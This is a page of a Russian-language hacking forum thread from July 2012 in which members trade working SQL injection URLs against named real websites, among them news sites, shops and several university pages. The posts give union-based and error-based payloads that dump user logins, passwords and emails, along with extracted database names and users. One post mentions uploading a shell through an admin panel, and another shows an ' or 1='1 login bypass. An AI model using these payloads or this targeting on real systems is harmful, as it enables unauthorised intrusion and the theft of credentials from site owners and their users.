HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1494 из 1602 « Первая < 494994139414441484 1490 1491 1492 1493 1494 1495 1496 1497 1498 150415441594 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.07.2012, 22:38
PRosTo_LEva
Новичок
Регистрация: 18.04.2007
Сообщений: 1
Провел на форуме:
2012

Репутация: 0
По умолчанию
Тиц 30

Код:
Code:
http://semargl.net.ua/photo/indexex.php?id_parent=1+union+select+version()--
 
Ответить с цитированием

  #2  
Старый 12.07.2012, 05:57
^NSA^
Guest
Сообщений: n/a
Провел на форуме:
19040

Репутация: 32
По умолчанию
chumlung

Цитата:
Сообщение от None  
http://www.chumlung.org.np/news_detail.php?id=-2 union select 1,2,3,concat_ws(0x3a,Password,Email),5 from users--
 
Ответить с цитированием

  #3  
Старый 12.07.2012, 22:47
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию
PR ==6;

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.benyagoda.com/show-story.php?id=-102+union+select+1,2,convert(version()+using+latin1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 --[/COLOR][/COLOR] 
PR == 4, DMOZ == true;

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.vov.com/ichoose/story.php?id=-2+union+select+1,concat_ws(0x03a,username_usr,password_usr,email_usr),3,4,5+from+cms_user_usr --[/COLOR][/COLOR] 
PR == 4; вывод в

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.njar.com/story.php?id=-228+union+select+1,2,concat_ws(0x03a,database(),user(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 --[/COLOR][/COLOR] 
 
Ответить с цитированием

  #4  
Старый 13.07.2012, 20:47
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию
Корпоративное издание

ООО «Пермская финансово-производственная группа»

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//pfp-gazeta.pfpg.ru/articles?rub=-1+union+select+1,2,3,4,5,6,7#[/COLOR][/COLOR] 
Shell отлично льется через администраторскую панель. Кстати, админка по дефолтному адресу:/admin
 
Ответить с цитированием

  #5  
Старый 14.07.2012, 11:34
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию
Самарская государственная сельскохозяйственная академия.

Код:
Code:
http://www.ssaa.ru/index.php?news=1488-1.1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10,11,12--
Database Version: 5.5.25-cll

Database name: ssaa

User name: webadmin@localhost

ТИЦ: 475

PR: 5
 
Ответить с цитированием

  #6  
Старый 14.07.2012, 20:51
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию
www.minimaks.ru

www.minimaks.ru

Тиц 1000

Логины

Цитата:
Сообщение от None  
яhttp://www.minimaks.ru/?a=-1'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING( group_concat(login),1,31))from(tbl_users)))))and(1 )='1
Пароли

Цитата:
Сообщение от None  
яhttp://www.minimaks.ru/?a=-1'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING( group_concat(pwd),1,31))from(tbl_users)))))and(1)= '1
 
Ответить с цитированием

  #7  
Старый 14.07.2012, 22:10
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию
ПР=3, в базе ~7k юзеров

Цитата:
Сообщение от None  
http://www.wired2fire.co.uk/build.php?systype=2&fsb=-1+union+select+1,2,3,4,5,6,7,@@version,9,10,11+--
 
Ответить с цитированием

  #8  
Старый 14.07.2012, 22:54
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Магазинчик околовоенной тематики, а точнее вроде как снайперских прицелов =)

Site: www.trijicon.com

Inject:

Код:
Code:
_ttp://www.trijicon.com/na_en/products/product1.php?id=ACOG'/**/and/**/substring((@@version),1,1)='5
Info:

DB= iwt_trijicon

MySQL >5

UsersPath wt_trijicon->users->user_login|user_password|user_email

TYC = 40

PR = 4


На этом вроде бы всё, но на сайте есть куча параметров которые не фильтруются, и тогда я проверил свою догадку...

_ttps://www.trijicon.com/na_en/login.php

Email= ' or 1='1

Password = ' or 1='1

В яблочко =) (как раз в тему снайперских прицелов)
 
Ответить с цитированием

  #9  
Старый 15.07.2012, 00:27
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
PR9

Тиц 800

PR 9

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//groups.csail.mit.edu/locomotion/lrcc/robot.cgi?id=-1+union+select+1,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6--+f[/COLOR][/COLOR] 
Тиц 950

PR 8

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//brainatlas.msu.edu/databases/msusection/details.php?id=-1+union+select+1,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+f[/COLOR][/COLOR] 
Тиц 140

PR 7

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//java.fmcc.suny.edu/~fyunker/player.php?listname=rock&id=23&orderid=23+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),5,6,7,8--+g[/COLOR][/COLOR] 
Тиц 110

PR 7

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//lowcountrydigital.library.cofc.edu/web/browse/type/results.php?sort=title&id=1&alpha=S'+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g[/COLOR][/COLOR] 
Тиц 500

PR 7

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//cs.gmu.edu/~jpsousa/bibadmin/show.php?id=-1'+union+select+1,2,(select(@n)from(select(@n:=0x20),(select(null)from(jpsousa_papers.bib_user)where(@n:=concat(@n,0x3c62723e,id,0x3a,user,0x3a,pass))))n),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+f&type=bib

[/COLOR][/COLOR
 
Ответить с цитированием

  #10  
Старый 15.07.2012, 12:41
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию
Новостройки в Подмосковье.

Код:
Code:
http://www.iase.caravan.ru/dom-kvartira.php?unit=&group=&group2=1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())--
Database Version: 5.0.45

Database name: iase

User name: iase@localhost

ТИЦ: 0

PR: 2
 
Ответить с цитированием
Ответ
Страница 1494 из 1602 « Первая < 494994139414441484 1490 1491 1492 1493 1494 1495 1496 1497 1498 150415441594 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ